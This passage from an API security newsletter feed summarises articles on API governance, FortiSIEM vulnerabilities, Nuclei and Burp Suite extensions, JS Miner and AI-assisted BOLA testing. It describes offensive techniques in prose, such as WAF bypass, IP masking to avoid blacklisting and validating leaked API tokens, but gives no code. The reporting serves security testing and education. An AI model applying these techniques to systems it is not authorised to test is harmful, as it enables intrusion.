<li style="font-weight: 400;" aria-level="1"><b>Token-based Access Control:</b><span style="font-weight: 400;"> Token-based access control systems enhance security by adding a layer of protection beyond token validation. Users are authenticated and issued new tokens granting ecosystem-wide access, which can be easily revoked to prevent misuse.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is not an easy problem to solve at scale, but this is certainly a good starting point.</span></p>
<h2><span style="font-weight: 400;">Article: Using Nuclei any good for API hacking?</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In the </span><a href="https://danaepp.com/is-nuclei-any-good-for-api-hacking" target="_blank" rel="noopener"><span style="font-weight: 400;">first of two articles from Dana Epp</span></a><span style="font-weight: 400;">, he looks at using Nuclei for API hacking. For the unaware, Nuclei is a cutting-edge, template-based vulnerability scanner widely used by bug bounty hunters to scan for low-hanging vulnerabilities. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Dana highlights four ways in which Nuclei can aid in API security testing:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><b>Detecting technology in use</b><span style="font-weight: 400;">: Nuclei has templates that can detect the web server delivering content, the programming language being used, and even the type of WAF in place.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Finding secondary apps</b><span style="font-weight: 400;"> that might provide a foothold: Nuclei can help locate common login pages, admin panels, and portals, which can be valuable for gaining access to API artifacts and conducting reverse engineering and taint analysis.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Advanced app detection:</b><span style="font-weight: 400;"> The author suggests using Nmap to scan all responding ports on a target, creating a targets.txt file, and then running Nuclei with the -silent switch to efficiently detect exposed secondary apps.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Testing leaked API tokens: </b><span style="font-weight: 400;">When potentially leaked API keys are discovered during recon or reverse engineering, Nuclei&#8217;s token-spray templates can help determine the service the key belongs to and whether it is valid.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">Dana also describes how to integrate Nuclei with Burp Suite … of course. Dan’s conclusion is that Nucei is potentially a useful tool in the armoury of offensive teams.</span></p>
<h2><span style="font-weight: 400;">Article: Five more Burp extensions for API hacking</span></h2>
<p style="font-weight: 400;"><a href="https://danaepp.com/5-more-burp-extensions-for-api-hacking" target="_blank" rel="noopener"><span style="font-weight: 400;">In the final article this week</span></a><span style="font-weight: 400;">, Dana features five more Burp Suite extensions that he recommends for API hacking. The extensions are as follows:</span></p>
<ol style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">J</span><b>S Miner:</b><span style="font-weight: 400;"> Automatically scans for hardcoded secrets, credentials, and subdomains and can reconstruct source code from JavaScript Source Map Files. This allows for source code-level access to the front end, enabling the use of code analysis tools to detect potentially dangerous functions.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>GAP:</b><span style="font-weight: 400;"> Helps find potential endpoints and parameters through the web app&#8217;s JavaScript, and can generate a custom target wordlist based on the collected data. It can also detect suspect parameters and map them to vulnerability classes.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>VPS Proxy:</b><span style="font-weight: 400;"> Allows for the automatic creation and deletion of an upstream SOCKS5 proxy on popular cloud services, masking the actual testing host&#8217;s IP address from the target. This is useful for preventing blacklisting by WAFs during penetration testing and bug bounty hunting.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Bypass WAF:</b><span style="font-weight: 400;"> Designed to trick WAF devices into believing a request is from itself by adding specific headers, modifying the Host Header, performing HTTP Parameter Pollution attacks, and changing the encoding to bypass the WAF in use.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Nuclei Burp Integration:</b><span style="font-weight: 400;"> Integrates the Nuclei vulnerability scanner into Burp Suite, automatically pushing detected findings into the Issues panel in the Burp Suite dashboard. This extension allows for tailored scans and easy review of logs within the Burp environment.</span></li>
</ol>
<p style="font-weight: 400;"><span style="font-weight: 400;">Another one for the offensive teams out there. Thanks again, Dana.</span></p>
<p>The post <a href="https://apisecurity.io/issue-243-economics-of-api-attacks-understanding-cors-blocking-compromised-api-tokens/">Issue 243: Economics of API attacks, understanding CORS, blocking compromised API tokens</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 242: API governance to avoid tech sprawl, API security in digital transformation, AI for APIs</title>
		<link>https://apisecurity.io/issue-242-api-governance-to-avoid-tech-sprawl-api-security-in-digital-transformation-ai-for-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 20 Mar 2024 16:33:43 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11092</guid>

					<description><![CDATA[<p>This week, we have thoughts from Bill Doerrfeld on how API governance is essential to counter technology sprawl. We also have commentary on how API security is essential in the age of digital transformation and another on why APIs are the new battleground for security. We have two articles on AI for APIs: firstly, how [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-242-api-governance-to-avoid-tech-sprawl-api-security-in-digital-transformation-ai-for-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-242-api-governance-to-avoid-tech-sprawl-api-security-in-digital-transformation-ai-for-apis/">Issue 242: API governance to avoid tech sprawl, API security in digital transformation, AI for APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we have thoughts from Bill Doerrfeld on how API governance is essential to counter technology sprawl. We also have commentary on how API security is essential in the age of digital transformation and another on why APIs are the new battleground for security. We have two articles on AI for APIs: firstly, how to use AI to find API bugs and how AI will enable APIs. Finally, we close with Dana Epp on using JS Miner to detect API endpoints and source code.</span></p>
<h2><span style="font-weight: 400;">Article: API governance to avoid technology sprawl</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The first article this week is </span><a href="https://www.cio.com/article/1305658/why-cios-back-api-governance-to-avoid-tech-sprawl.html" target="_blank" rel="noopener"><span style="font-weight: 400;">an excellent piece from Bill Doerrfeld</span></a><span style="font-weight: 400;"> on how API governance is essential to avoid technology sprawl. The article canvasses the views of several industry thought leaders on the proliferation of APIs and how these need to be governed to prevent an unmanageable sprawl of technology, which in turn leads to greater risk to organizations and consumers.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">APIs are essential for modern software architectures because they enable data and business services to be integrated across platforms, including mobile and desktop applications. API-first approaches are becoming increasingly popular, providing advantages such as abstraction, automation, and governance. Coupled with this is the fact that new next-generation platforms (LLM-based services or no/low-code platforms) are highly reliant on APIs as their connecting fiber. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">To make things even worse from a governance viewpoint is the fact that API ubiquity presents IT management challenges such as inconsistent design patterns, communication silos, access control, documentation hurdles, and monitoring, performance, and scalability concerns. Additionally, businesses must consider the value proposition, target user, business objectives, and marketing/monetization of APIs. </span></p>
<p style="font-weight: 400;">Gartner’s Mark O’Neill feels that consistency is key to governance:</p>
<blockquote class="blockquote">
<p style="font-weight: 400;"><i>“When good API governance is in place, consistent design means all your organization’s APIs look like they were defined by the same team, even if many teams were involved,” </i></p>
</blockquote>
<p style="font-weight: 400;">Successful API governance initiatives should improve design, provide visibility, future-proof IT strategy, and streamline workflows.</p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The importance of good API governance includes the following:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Guardrails bring CIOs peace of mind</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Helping to attain business objectives</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Governance guides more confident usage</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">API governance is critical for a successful API strategy; unfortunately, it is often hard to achieve in practice.</span></p>
<h2><span style="font-weight: 400;">Article: API security in the age of digital transformation</span></h2>
<p style="font-weight: 400;"><a href="https://www.businessdailyafrica.com/bd/opinion-analysis/columnists/the-importance-of-api-security-in-the-age-of-digital-transformation-4531488" target="_blank" rel="noopener"><span style="font-weight: 400;">The next article from Business Daily Africa</span></a><span style="font-weight: 400;"> highlights the growing importance of API security in the age of digital transformation, particularly in the financial services sector. As companies increasingly adopt APIs to facilitate communication between applications, the risk of cyberattacks targeting these APIs also rises.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Hackers are attracted to APIs due to the valuable data and functionality they provide, lack of proper security measures, integration complexity, third-party risks, and skills gaps. To address these challenges, the authors emphasize the need for cooperation between cybersecurity teams and software developers to defend APIs effectively.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">To ensure API security, reliability, and successful integration, the authors recommend several strategies:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Implementing strong authentication and authorization mechanisms</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Designing secure APIs and coding standards</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Comprehensive logging and monitoring to identify and respond to security incidents</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Conducting regular security assessments and penetration testing</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Developing incident response plans and disaster recovery mechanisms</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">By adopting these strategies, companies can mitigate potential risks associated with APIs, provide a reliable experience for users and developers, and ensure business continuity in the face of potential security breaches or disruptions.</span></p>
<h2><span style="font-weight: 400;">Article: APIs are the new battleground for security</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Pulling the first two articles together nicely, we have </span><a href="https://cxotoday.com/specials/why-apis-are-the-new-battleground-for-security/" target="_blank" rel="noopener"><span style="font-weight: 400;">our third article</span></a><span style="font-weight: 400;"> describing why APIs are the new battleground for security. The authors highlight the concerns around API sprawl as a major challenge, with organizations losing track of their APIs and facing difficulties in managing and securing them effectively.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Since APIs provide access to sensitive data and may have vulnerabilities, APIs are becoming increasingly appealing to attackers because of their access to sensitive data and potential vulnerabilities. The lack of standardization in APIs makes it challenging to develop a comprehensive security strategy for them.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The authors highlight best practices for API security, such as:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Implementing authentication and authorization mechanisms</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Using rate limiting to protect against brute force and DDoS attacks</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Validating input parameters to prevent injection attacks and other vulnerabilities</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Encrypting sensitive data and securing communication with SSL/TLS</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Monitoring and logging API usage to detect and respond to security incidents</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Conducting regular security testing to identify vulnerabilities</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Following secure coding practices during API development</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">Perhaps most important is the need for a comprehensive API architecture and management framework, including central management tools and the use of API gateways for security checks and monitoring.</span></p>
<h2><span style="font-weight: 400;">Article: Using AI to find API bugs</span></h2>
<p style="font-weight: 400;"><a href="https://apisecurity.io/issue-230-opensea-api-breach-flaw-in-atlas-vpn-using-api-fuzzing/" target="_blank" rel="noopener"><span style="font-weight: 400;">Previously, we have featured</span></a><span style="font-weight: 400;"> Dana Epp’s thoughts on using Postman’s new AI feature called Postbot to test or attack APIs, and this week </span><a href="https://zerodayhacker.com/using-ai-to-find-api-bugs/" target="_blank" rel="noopener"><span style="font-weight: 400;">we have Edward Lichtner’s views</span></a><span style="font-weight: 400;"> on the same topic. As a recap: Postbot is an AI prompt within Postman that allows for the automated generation of test scripts with Postman. Combining this feature with Postman&#8217;s collection runner capabilities provides a very powerful API testing platform.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The author describes some typical scenarios that can be automated, including:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Scanning for endpoints that include a JWT in the authorization header and a URL parameter, which could lead to broken object-level authorization (BOLA) vulnerabilities.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Searching for endpoints that return strings formatted as emails or UUIDs in the response body, potentially exposing other users&#8217; information.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Identifying endpoints with CORS misconfigurations by looking for the &#8220;Access-Control-Allow-Origin: *&#8221; header.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Looking for email addresses in the response body.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Fuzzing an endpoint by looping through numbers 1 to 15 and polluting the &#8220;report_id&#8221; parameter to identify BOLA vulnerabilities.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">The are some limitations of Postman&#8217;s free plan, and the author suggests alternatives like ChatGPT, Hacking APIs GPT, and SecGPT for generating test scripts when the Postbot call limit is reached.</span></p>
<h2><span style="font-weight: 400;">Article: How AI will enable APIs</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Sticking to the topic of AI, the </span><a href="https://nordicapis.com/how-will-ai-enable-apis/" target="_blank" rel="noopener"><span style="font-weight: 400;">next article from Nordic APIs </span></a><span style="font-weight: 400;">takes a forward-looking view of the possibilities of using AI and APIs together. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">As the previous article showcases so effectively, AI can easily be used to improve the API development lifecycle itself, including:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">AI algorithms can automatically generate client-side code that consumes APIs and server-side code that exposes APIs.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">AI can be used to improve the layout of API resources, align APIs with industry best practices, and create APIs that are more tailored to specific use cases.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">AI can prevent data breaches by analyzing API traffic and identifying malicious communication patterns. Several existing tools already use AI for API security.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">The authors then take a fascinating look at the art of the possible, where AI and APIs combine to create a world where applications are intelligent, personalized, and adaptive. According to them, this will happen in phases of enablement, as follows:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">With APIs, applications can self-integrate, eliminating the need for human intervention.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">The APIs will enable autonomous applications to navigate and adapt to their environments.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Autonomous business integration depends on APIs for evaluating, entering, and fulfilling contracts.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">The pinnacle of AI interfaces is that they are capable of understanding a user&#8217;s input and choosing the appropriate API to complete the task, and the future holds exciting possibilities.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">The convergence of AI and APIs holds immense potential to make applications more intelligent, adaptive, and efficient, though it also comes with strategic implications for technology providers to navigate. The two technologies have a bright future together.</span></p>
<h2><span style="font-weight: 400;">Guide: Using JS Miner to detect API endpoints</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Finally, let us conclude this week with Dana Epp </span><a href="https://danaepp.com/detecting-api-endpoints-and-source-code-with-js-miner" target="_blank" rel="noopener"><span style="font-weight: 400;">discussing how to use JS Miner </span></a><span style="font-weight: 400;">to detect API endpoints. JS Miner is a free Burp Suite Professional extension that finds interesting stuff inside static files like JavaScript and JSON, and it provides the following features:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">It automatically scans for hard-coded secrets and credentials.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">It passively scans for subdomains the web app calls and pulls code and data from.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">It can actively try to construct source code from JavaScript Source Map Files (if found).</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">It passively tries to detect API endpoints that use GET/POST/PUT/DELETE/PATCH.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">Dana shows how to use JS Miner using the following steps:</span></p>
<ol style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Walk the app to download all static content.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Let JS Miner scan passively to orient yourself with the app.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Force JS Miner to run an active scan.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Check for any JS Source Mapper results to discover any .map files.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Explore the code and extract routes and endpoints.</span></li>
</ol>
<p style="font-weight: 400;"><span style="font-weight: 400;">Although this plugin requires the Professional edition of Burp Suite, it looks like an extremely powerful tool to be able to reverse engineer APIs from their web front end. Thanks to Dana for another great read.</span></p>
<p>The post <a href="https://apisecurity.io/issue-242-api-governance-to-avoid-tech-sprawl-api-security-in-digital-transformation-ai-for-apis/">Issue 242: API governance to avoid tech sprawl, API security in digital transformation, AI for APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 241: Two critical flaws in FortiSIEM product, making public APIs private, API security strategy</title>
		<link>https://apisecurity.io/issue-241-two-critical-flaws-in-fortisiem-product-making-public-apis-private-api-security-strategy/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 06 Mar 2024 16:37:49 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11075</guid>

					<description><![CDATA[<p>This week, we have news of two critical vulnerabilities in the Fortinet FortiSIEM product. We also have articles on making public APIs private and building an API security strategy. Dana Epp offers his thoughts on the difference between endpoints and routes, and we have two developer-focused tutorials, one on securing gRPC and the other on [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-241-two-critical-flaws-in-fortisiem-product-making-public-apis-private-api-security-strategy/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-241-two-critical-flaws-in-fortisiem-product-making-public-apis-private-api-security-strategy/">Issue 241: Two critical flaws in FortiSIEM product, making public APIs private, API security strategy</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we have news of two critical vulnerabilities in the Fortinet FortiSIEM product. We also have articles on making public APIs private and building an API security strategy. Dana Epp offers his thoughts on the difference between endpoints and routes, and we have two developer-focused tutorials, one on securing gRPC and the other on Django API security best practices.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Two critical flaws in Fortinet FortiSIEM product</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">This week&#8217;s main news is</span><a href="https://www.theregister.com/2024/02/06/fortinet_fortisiem_vulns/" target="_blank" rel="noopener"><span style="font-weight: 400;"> the further coverage</span></a><span style="font-weight: 400;"> of the two critical issues reported in the Fortinet FortiSIEM product courtesy of The Register. The two vulnerabilities (tracked as </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-23108" target="_blank" rel="noopener"><span style="font-weight: 400;">CVE-2024-23108</span></a><span style="font-weight: 400;"> and </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-23109" target="_blank" rel="noopener"><span style="font-weight: 400;">CVE-2024-23109</span></a><span style="font-weight: 400;">) were rated as critical with a CVSS score of 10, indicating that the exploits can be carried out remotely by unauthenticated attackers and are low in complexity. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">According to The Register, there was some confusion about whether these were two new vulnerabilities or whether they referred to previously identified vulnerabilities. Current consensus suggests that these are two new vulnerabilities that have yet to be patched or remediated by Fortinet. The guidance from Fortinet is to upgrade to version 7.1.2 immediately, as this version is not believed to be vulnerable. Fortunately, there do not appear to be any available exploits in the public domain.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The advisory suggests that the vulnerability is related to an API endpoint susceptible to specially crafted payloads manifesting in OS command injections (CWE-78). Although no longer in the OWASP API Security Top 10, injection attacks are still highly prominent and often lead to high-severity vulnerabilities (such as this example.)</span></p>
<h2><span style="font-weight: 400;">Article: How to make public APIs private</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">DevOps.com </span><a href="https://devops.com/squaring-the-circle-how-to-make-public-apis-private/" target="_blank" rel="noopener"><span style="font-weight: 400;">featured a very interesting article</span></a><span style="font-weight: 400;"> on how to make public APIs private, which will pique readers&#8217; interest. The author highlights a problem we are only well too aware of — APIs are by their nature most commonly publicly accessible, making them easy to attack. Coupled with this are the generally poor levels of protection offered by so-called ‘Day 2’ solutions such as WAFs, IDS, etc. These are usually not suited to zero attacks leveraged against APIs. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The author proposes a novel solution using a zero-trust overlay network. The concept is simple and comprises three components:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">The existing API clients are redirected to the overlay network rather than directly to the API</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">A zero-trust overlay network</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">API servers on a private network segment</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">The overlay network provides several core security features, namely:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><b>Eliminating public access:</b><span style="font-weight: 400;"> clients connect to the overlay network rather than directly to the API servers.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Identity, authentication, authorization, and mutual TLS: </b><span style="font-weight: 400;">the overlay network becomes the enforcement point for critical security primitives. Developers only have to add a few lines of code to access the overlay network securely.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Outbound-only:</b><span style="font-weight: 400;"> The API server does not accept input connections but instead makes outbound connections to the overlay network to accept requests.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Ease of management: </b><span style="font-weight: 400;">the overlay network is a software-only solution allowing central management. </span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article describes the proof of concept using the</span><a href="https://openziti.io/" target="_blank" rel="noopener"><span style="font-weight: 400;"> Open Ziti </span></a><span style="font-weight: 400;">zero-trust networking solution, which looks like a very interesting project in its own right. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The approach described contains some promising ideas, particularly the reduction of API servers&#8217; attack surface and the integration of many core API security-critical components (authentication, authorization, mTLS) into the fabric. </span></p>
<h2><span style="font-weight: 400;">Article: Developing an API security strategy</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">HelpNet Security is next </span><a href="https://www.helpnetsecurity.com/2024/02/21/api-security-strategy/" target="_blank" rel="noopener"><span style="font-weight: 400;">with its views</span></a><span style="font-weight: 400;"> on the importance of an API security strategy. The author cites the recent Cloudflare report, which suggested that 57% of internet traffic is now API-related. More concerning is that 60% of organizations have experienced at least one breach in the last two years. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The author suggests that an API strategy is essential for countering the threats posed to APIs, including DDoS, brute force, code injection, and man-in-the-middle attacks. They recommend starting with the OWASP API Security Top 10 to understand the threats and then adopting something like the NIST Cybersecurity Framework to identify a strategy.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Their recommendations include focusing on the following:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Hardening authentication and authorization implementations</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Using SSL/TLS everywhere</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Implementing zero-trust access controls</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Perform regular security tests and assessments</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Frequent updates and patching of vulnerabilities</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Continuous monitoring and alerting</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Using API gateways </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Using a WAF or API protection solution</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">To this, I emphasize the importance of a shift-left approach to API security, which focuses on a developer-led approach to secure API development.</span></p>
<h2><span style="font-weight: 400;">Guide: Endpoints versus routes</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Dana Epp </span><a href="https://danaepp.com/endpoints-vs-routes" target="_blank" rel="noopener"><span style="font-weight: 400;">returns to the newsletter this week</span></a><span style="font-weight: 400;"> with his thoughts on the difference between an endpoint and a route. From my perspective, these terms are used somewhat interchangeably in our industry, yet—as Dana points out—there are quite distinct differences that are worth exploring. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">An endpoint is a specific URL/URI that a client application can access. It is a unique location in the network namespace. For example,</span></p>
<p><button disabled="disabled">https://api.example.com/reader  </button><span style="font-weight: 400;">and </span><button disabled="disabled">https://api.example.com/subscribers </button><span style="font-weight: 400;">are two distinct endpoints.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">An API route further distinguishes itself from the endpoint by introducing the HTTP operation in question (such as GET, POST, PUT, DELETE). For example, a single endpoint can have a route that responds to the GET operation (reading a value) and the POST operation (writing a value). </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This distinction is important because the code implementation in the backend might be distinct for different routes and behave quite differently. It is essential that all routes are tested individually and that one does not rely on only one endpoint test. A common anti-pattern is that routes are implemented slightly differently. A good case in point is a DELETE operation that does not validate if the caller has permission to actually delete the object. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Or, more simply put in meme form:</span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-11076" src="https://apisecurity.io/wp-content/uploads/2024/03/Issue-241-Article4-300x296.jpg" alt="" width="496" height="489" srcset="https://apisecurity.io/wp-content/uploads/2024/03/Issue-241-Article4-300x296.jpg 300w, https://apisecurity.io/wp-content/uploads/2024/03/Issue-241-Article4-768x757.jpg 768w, https://apisecurity.io/wp-content/uploads/2024/03/Issue-241-Article4.jpg 962w" sizes="auto, (max-width: 496px) 100vw, 496px" /></p>
<h2><span style="font-weight: 400;">Guide: Django API security best practices</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Finally, </span><a href="https://securityboulevard.com/2024/01/best-django-security-practices/" target="_blank" rel="noopener"><span style="font-weight: 400;">we have a guide</span></a><span style="font-weight: 400;"> on how to secure Django-based API implementations. Django is a popular Python framework used for web applications and API servers. Fortunately, Django is considered a secure framework with sensible, secure defaults and built-in security primitives.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The guide features a range of popular third-party libraries providing support for the following:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">User registration, authentication, and password management</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Content Security Policy (CSP) to counter XSS attacks</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Rate-limiting protections</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Fine-grained access controls to data</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Transparent encryption</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">The guide gives guidance on advanced topics, including:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Authentication, including MFA and social media authentication</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Authorization, including RBAC and group-based authorization</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Input validation and output encoding</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Secure configuration</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">Django is a good choice for Python-based APIs, and this guide is a great place to start when it comes to securing them.</span></p>
<h2><span style="font-weight: 400;">API Security Workshop: Austin Mar 11, 2024<br />
</span></h2>
<p>Join 42Crunch next week at the <a href="https://nordicapis.com/events/austin-api-summit-2024/" target="_blank" rel="noopener">Austin API Summit</a> for a dedicated API Security workshop.</p>
<p><strong>Workshop Leaders</strong></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-11088" src="https://apisecurity.io/wp-content/uploads/2024/03/42Crunch-API-Security-Workshop-2024-Austin-300x58.png" alt="" width="553" height="107" srcset="https://apisecurity.io/wp-content/uploads/2024/03/42Crunch-API-Security-Workshop-2024-Austin-300x58.png 300w, https://apisecurity.io/wp-content/uploads/2024/03/42Crunch-API-Security-Workshop-2024-Austin-768x148.png 768w, https://apisecurity.io/wp-content/uploads/2024/03/42Crunch-API-Security-Workshop-2024-Austin.png 968w" sizes="auto, (max-width: 553px) 100vw, 553px" /></p>
<p><strong>Topics covered include:</strong></p>
<ul>
<li>The context for API security (the need, the differences, the opportunities)</li>
<li>Understanding the OWASP API Security Top 10 vulnerabilities</li>
<li>Overview of several recent high-profile API breaches</li>
<li>Building secure APIs by design</li>
<li>Developing secure APIs</li>
<li>Protecting APIs</li>
</ul>
<p><strong>25% Discount Code: 42crunchworkshop</strong></p>
